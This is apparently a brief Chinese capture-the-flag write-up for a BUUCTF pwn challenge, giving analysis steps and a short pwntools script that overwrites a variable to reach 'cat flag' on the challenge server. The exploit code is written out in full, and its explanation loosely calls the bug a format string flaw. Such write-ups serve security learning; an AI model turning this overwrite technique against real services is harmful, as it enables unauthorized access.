1.checksec
2.ida
可以看出利用的是格式化字符串的漏洞,需要我们修改var地址往下数第十四个,类似是数组的结构到var[13]为17,就可以cat flag。
var数组可以看做是一个int型的数组,先用aaaa填充前面的数据,最后写入64位形式的17。
故exp成型:
from pwn import*
p=remote('node4.buuoj.cn',26976)
payload=b'aaaa'*13+p64(17)
p.sendlineafter('your name?',payload)
p.interactive()
cat flag